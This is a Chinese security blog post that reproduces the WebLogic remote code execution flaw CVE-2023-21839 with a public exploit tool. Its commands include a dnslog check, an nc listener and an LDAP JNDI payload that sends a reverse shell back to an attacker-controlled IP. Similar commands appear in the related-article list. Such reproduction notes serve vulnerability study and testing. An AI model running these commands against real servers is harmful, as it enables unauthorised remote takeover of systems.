CVE-2023-21839 Weblogic未授权RCE

最新推荐文章于 2024-07-06 10:53:58 发布

番茄酱料

最新推荐文章于 2024-07-06 10:53:58 发布

阅读量1.1k

点赞数

分类专栏： CVE 文章标签： web安全网络安全

本文链接：https://blog.csdn.net/bring_coco/article/details/132550882

版权

CVE 专栏收录该内容

13 篇文章 0 订阅

订阅专栏

https://github.com/4ra1n/CVE-2023-21839下载之后
在这里插入图片描述
生成CVE-2023-21389.exe
先试试dnslog：

CVE-2023-21839.exe -ip 116.xx.xx.xx -port 7001 -ldap ldap://whoami.eduvck.dnslog.cn/aa

在这里插入图片描述

然后使用JNDIExploit-1.4-SNAPSHOT.jar进行攻击
另一个终端上
首先开启监听

nc -lvp 5858

在这里插入图片描述
然后用JNDIExploit-1.4-SNAPSHOT.jar监听jndi端口

然后执行exp

CVE-2023-21839.exe -ip 116.xx.xx.xx -port 7001 -ldap ldap://47.xx.xx.xx:1389/Basic/ReverseShell/47.xx.xx.xx/5858

在这里插入图片描述

这样就成功弹回了shell

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

番茄酱料

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

CVE-2023-21839：Weblogic反序列化漏洞复现

薛定谔嘚喵博客

04-16

4207

WebLogic是美国Oracle公司出品的一个application server，确切的说是一个基于JAVAEE架构的中间件，WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。

WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)

0xSec

02-11

5433

WebLogic存在远程代码执行漏洞，该漏洞允许未经身份验证的远程攻击者通过T3/IIOP协议网络访问并破坏易受攻击的WebLogic服务器，成功利用此漏洞可能导致Oracle WebLogic服务器被接管或敏感信息泄露。

参与评论您还未登录，请先登录后发表或查看评论

CVE-2023-33246 Apache RocketMQ 命令注入漏洞复现及分析

牛叫兽的测试学习和分享

06-02

9452

CVE-2023-33246 漏洞复现及分析

CVE-2023-32233 Linux kernel

sash1mi

05-16

1889

近日，研究人员发现了Linux内核的NetFilter框架中的新漏洞（CVE-2023-32233）。该漏洞可被本地用户用于将权限提升为root，并完全控制系统。问题的根源在于是如何处理批处理请求的，经过身份验证的本地攻击者可通过发送特制的请求破坏的内部状态，从而获得更高权限。该漏洞影响多个Linux内核版本，包括当前的稳定版本v6.3.1。漏洞原文。

CVE-2023-32233 （LINUX内核权限提升漏洞）

最新发布

m0_65354386的博客

07-06

1531

Linux内核版本v5.14 — v6.6的netfilter 子系统nf_tables组件中存在释放后使用漏洞，由于在nft_verdict_init（）函数中，允许正值作为hook判决中的丢弃错误，因此当NF_DROP发出类似于NF_ACCEPT的丢弃错误时，nf_hook_slow（）函数可能会导致双重释放漏洞，从而本地低权攻击者可利用该漏洞将权限提升为root，对目标进行恶意攻击。目前该漏洞已经修复，受影响用户可通过升级系统或禁用受影响的 nf_tables 内核模块可以缓解此漏洞。

CVE-2023-0215

qq_39933800的博客

06-14

2848

生产版本：5.5。

CVE-2023-29489 cPanel XSS漏洞分析研究

蚁景网安学院

05-04

1766

前言由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。如果文章中的漏洞出现敏感内容产生了部分影响，请及时联系作者，望谅解。一、漏洞原理漏洞简述cPanel 是一套在网页寄存业中最享负盛名的商业软件，是基于于 Linux 和 BSD 系统及以 PHP 开发且性质为闭源软件；提供了足够强大和相当完整的主机管理功能，诸如：Webmail ...

CVE-2023-34541 LangChain 任意命令执行

蚁景网安学院

06-27

1379

漏洞简介LangChain是一个用于开发由语言模型驱动的应用程序的框架。在LangChain受影响版本中，由于load_prompt函数加载提示文件时未对加载内容进行安全过滤，攻击者可通过构造包含恶意命令的提示文件，诱导用户加载该文件，即可造成任意系统命令执行。漏洞复现在项目下编写 test.pyfromlangchain.promptsimportload_prompt if__name...

CVE-2023-21839 WebLogic Server RCE分析

Jay

04-18

843

在后续的进行lookup操作之前会检查 JNDI 环境是否已正确配置以访问远程资源，主要是对jndiEnvironment和remoteJNDIName的检测，如果在if中的任何一个条件为真，那么将调用对象的lookup方法，如果 if 语句中的所有条件都为假，则会进入检查cachedReferent字段的阶段。weblogic10 及以后的版本，不能直接使用server/lib 目录下的 weblogic.jar 了，需要手动执行一个命令生成手动生成 wlfullclient.jar。

CVE-2023-21839漏洞复现

qq_34914659的博客

02-28

4120

CVE-2023-21839漏洞复现

CVE-2021-2109:通过JNDI的CVE-2021-2109 && Weblogic Server RCE

05-26

描述 Oracle Fusion Middleware（组件：控制台）的Oracle WebLogic Server产品中的漏洞。受影响的受支持版本为10.3.6.0.0、12.1...如何RCE 步骤1：设定Weblogic 步骤2：登入步骤3：设定JNDI伺服器 java -cp marshals

CVE-2023-34541 LangChain 任意命令执行

YJ_12340的博客

06-27

1153

LangChain是一个用于开发由语言模型驱动的应用程序的框架。在LangChain受影响版本中，由于load_prompt函数加载提示文件时未对加载内容进行安全过滤，攻击者可通过构造包含恶意命令的提示文件，诱导用户加载该文件，即可造成任意系统命令执行。

[春秋云镜] CVE-2023-2130

m0_73649671的博客

04-22

878

在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击。

CVE-2023-33246 RCE漏洞复现

七堇年的博客

06-08

2134

在RocketMQ 5.1.0及以下版本在一定条件下，会存在远程命令执行风险；由于RocketMQ的NameServer、Broker、Controller等多个组件暴露在外网且缺乏权限验证，攻击者可以利用该漏洞利用更新配置功能以RocketMQ运行的系统用户身份执行命令。此外攻击者还可以通过伪造 RocketMQ 协议内容来达到同样的效果。

CVE-2023-33246命令执行复现分析

蚁景网安学院

06-16

758

简介RocketMQ是一款低延迟、高并发、高可用、高可靠的分布式消息中间件。既可为分布式应用系统提供异步解耦和削峰填谷的能力，同时也具备互联网应用所需的海量消息堆积、高吞吐、可靠重试等特性。影响版本<=RocketMQ 5.1.0<=RocketMQ 4.9.5环境搭建dockerpullapache/rocketmq:4.9.4root@ubuntu:/home/ubuntu/D...

CVE-2023-22809复现（Rot5pider安全团队）

weixin_52763014的博客

04-08

2902

在复现过程中，遇到了编辑器的版本问题，vim 8.0 没办法使用那条攻击命令报错是说vim不能使用--参数，但是换了一个环境的ubuntu下的vim8.1就可以执行，具体问题不是很清楚，可以多试试。具体格式就是: xxx ALL=(ALL:ALL) sudoedit /etc/xxx 其中第一个xxx是你要进行提权的普通用户的用户名，第二是etc下的一个随意文件（这里具体哪些能行哪些不能行，我也不知道，我测试的vim和xml都可以执行，多试试）保存退出，然后 su xxx切换到用户中。

CVE-2023-23752：Joomla未授权访问漏洞复现

薛定谔嘚喵博客

09-01

1602

Joomla是一个免费的开源内容管理系统（CMS），允许用户构建网站和在线应用程序。它于 2005 年首次发布，此后成为最受欢迎的 CMS 平台之一，为全球数百万个网站提供支持。在 Joomla！ 4.0.0 到 4.2.7 中发现了一个问题。不正确地访问检查允许对 Web 服务终结点进行未经授权的访问。

CVE-2023-21839 weblogic rce漏洞复现

wutiangui的博客

11-04

1550

C:\Program Files\Java\jdk1.8.0_181\bin>java -jar G:\资料\vulhub复现\weblogic\可行工具\Weblogic-CVE-2023-21839.jar 192.168.232.131:7001 ldap://192.168.180.2:1389/Basic/ReverseShell/192.168.180.2/2000。执行以上命令可以在dnslog上获得回显，即可验证可能存在该漏洞。复现之前请务必切换路径到jdk路径下。

CVE-2023-21839

08-17

CVE-2023-21839是一个Weblogic漏洞，可以导致远程代码执行。根据引用提供的信息，可以使用nc工具进行端口监听，用于接收反弹的shell。你可以在给出的GitHub链接中找到可用的工具。使用该工具前，需要先编译为可执行...